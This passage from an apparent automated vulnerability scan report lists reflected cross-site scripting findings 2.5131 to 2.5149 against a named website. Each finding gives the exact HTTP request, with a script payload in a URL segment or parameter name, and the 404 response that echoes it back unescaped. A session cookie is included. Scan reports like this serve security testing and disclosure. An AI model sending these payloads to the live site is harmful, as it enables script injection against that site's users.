This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/?1f534<script>alert(1)</script>3ed971fff1c=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/?1f534<script>alert(1)</script>3ed971fff1c=1 was not found on this server.</p>
...[SNIP]...

2.5131. http://www.resellerbase.com/web-service/other/themes/kosmos/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d26e9<script>alert(1)</script>2889c8b395f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-serviced26e9<script>alert(1)</script>2889c8b395f/other/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-serviced26e9<script>alert(1)</script>2889c8b395f/other/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.5132. http://www.resellerbase.com/web-service/other/themes/kosmos/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f7c89<script>alert(1)</script>c7d4ea56946 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/otherf7c89<script>alert(1)</script>c7d4ea56946/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/otherf7c89<script>alert(1)</script>c7d4ea56946/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.5133. http://www.resellerbase.com/web-service/other/themes/kosmos/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 11bb8<script>alert(1)</script>43f4b87fb0a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes11bb8<script>alert(1)</script>43f4b87fb0a/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes11bb8<script>alert(1)</script>43f4b87fb0a/kosmos/ was not found on this server.</p>
...[SNIP]...

2.5134. http://www.resellerbase.com/web-service/other/themes/kosmos/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7f863<script>alert(1)</script>b171899044e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/kosmos7f863<script>alert(1)</script>b171899044e/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos7f863<script>alert(1)</script>b171899044e/ was not found on this server.</p>
...[SNIP]...

2.5135. http://www.resellerbase.com/web-service/other/themes/kosmos/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 60822<script>alert(1)</script>c9cf4c3b983 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/kosmos/?60822<script>alert(1)</script>c9cf4c3b983=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos/?60822<script>alert(1)</script>c9cf4c3b983=1 was not found on this server.</p>
...[SNIP]...

2.5136. http://www.resellerbase.com/web-service/other/themes/kosmos/images/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/images/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7c6cf<script>alert(1)</script>0b7e70c7920 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service7c6cf<script>alert(1)</script>0b7e70c7920/other/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service7c6cf<script>alert(1)</script>0b7e70c7920/other/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.5137. http://www.resellerbase.com/web-service/other/themes/kosmos/images/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/images/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d6e9c<script>alert(1)</script>8df049c19d8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/otherd6e9c<script>alert(1)</script>8df049c19d8/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/otherd6e9c<script>alert(1)</script>8df049c19d8/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.5138. http://www.resellerbase.com/web-service/other/themes/kosmos/images/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/images/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d2390<script>alert(1)</script>88c2a7b382c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themesd2390<script>alert(1)</script>88c2a7b382c/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themesd2390<script>alert(1)</script>88c2a7b382c/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.5139. http://www.resellerbase.com/web-service/other/themes/kosmos/images/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/images/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 95225<script>alert(1)</script>14e88576b5f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/kosmos95225<script>alert(1)</script>14e88576b5f/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos95225<script>alert(1)</script>14e88576b5f/images/ was not found on this server.</p>
...[SNIP]...

2.5140. http://www.resellerbase.com/web-service/other/themes/kosmos/images/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/images/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 41119<script>alert(1)</script>08a4d5d9a3d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/kosmos/images41119<script>alert(1)</script>08a4d5d9a3d/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos/images41119<script>alert(1)</script>08a4d5d9a3d/ was not found on this server.</p>
...[SNIP]...

2.5141. http://www.resellerbase.com/web-service/other/themes/kosmos/images/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/images/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 1a744<script>alert(1)</script>f24050b77cc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/kosmos/images/?1a744<script>alert(1)</script>f24050b77cc=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos/images/?1a744<script>alert(1)</script>f24050b77cc=1 was not found on this server.</p>
...[SNIP]...

2.5142. http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ee2f7<script>alert(1)</script>9da76e04483 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-serviceee2f7<script>alert(1)</script>9da76e04483/other/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-serviceee2f7<script>alert(1)</script>9da76e04483/other/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.5143. http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 39fc8<script>alert(1)</script>17e23bae8fc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other39fc8<script>alert(1)</script>17e23bae8fc/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other39fc8<script>alert(1)</script>17e23bae8fc/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.5144. http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 55c54<script>alert(1)</script>2597c0138ae was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes55c54<script>alert(1)</script>2597c0138ae/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes55c54<script>alert(1)</script>2597c0138ae/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.5145. http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a3862<script>alert(1)</script>12c73a6c1ae was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/kosmosa3862<script>alert(1)</script>12c73a6c1ae/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmosa3862<script>alert(1)</script>12c73a6c1ae/images/rating/ was not found on this server.</p>
...[SNIP]...

2.5146. http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 9e83d<script>alert(1)</script>aa94aed3e72 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/kosmos/images9e83d<script>alert(1)</script>aa94aed3e72/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos/images9e83d<script>alert(1)</script>aa94aed3e72/rating/ was not found on this server.</p>
...[SNIP]...

2.5147. http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/ [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload e34f6<script>alert(1)</script>36444e72647 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/kosmos/images/ratinge34f6<script>alert(1)</script>36444e72647/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos/images/ratinge34f6<script>alert(1)</script>36444e72647/ was not found on this server.</p>
...[SNIP]...

2.5148. http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/images/rating/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 51f06<script>alert(1)</script>8b8fd72d390 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/kosmos/images/rating/?51f06<script>alert(1)</script>8b8fd72d390=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos/images/rating/?51f06<script>alert(1)</script>8b8fd72d390=1 was not found on this server.</p>
...[SNIP]...

2.5149. http://www.resellerbase.com/web-service/other/themes/kosmos/images/rating/0.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/other/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload da41e<script>alert(1)</script>b6a3c66aae8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-serviceda41e<script>alert(1)</script>b6a3c66aae8/other/themes/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-serviceda41e<script>alert(1)</script>b6a3c66aae8/other/themes/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

